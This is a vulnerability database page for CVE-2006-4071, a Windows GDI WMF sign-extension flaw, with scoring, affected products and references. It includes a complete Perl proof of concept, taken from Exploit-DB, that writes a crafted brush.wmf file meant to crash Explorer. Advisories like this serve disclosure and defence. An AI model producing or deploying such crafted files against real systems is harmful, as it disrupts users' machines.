CVE-2006-4071 : Detail

CVE-2006-4071

22.39%V4
Network
2006-08-09
23h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3111

Publication date : 2007-01-12 23h00 +00:00
Author : cyanid-E
EDB Verified : Yes

#!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>"; print "\n\ngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00"; print WMF "\x00\x00\x00\x00"; close(WMF); print "ok\n\nnow try to browse folder in XP explorer and wait :)\n"; # milw0rm.com [2007-01-13]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2003_server >> Version r2

    Microsoft>>Windows_2003_server >> Version sp1

      Microsoft>>Windows_xp >> Version *

      Microsoft>>Windows_xp >> Version *

      Microsoft>>Windows_xp >> Version *

      References

      http://www.securityfocus.com/bid/19365
      Tags : vdb-entry, x_refsource_BID
      https://www.exploit-db.com/exploits/3111
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.vupen.com/english/advisories/2006/3180
      Tags : vdb-entry, x_refsource_VUPEN
      http://secunia.com/advisories/21377
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://securityreason.com/securityalert/1353
      Tags : third-party-advisory, x_refsource_SREASON
      http://www.securityfocus.com/bid/21992
      Tags : vdb-entry, x_refsource_BID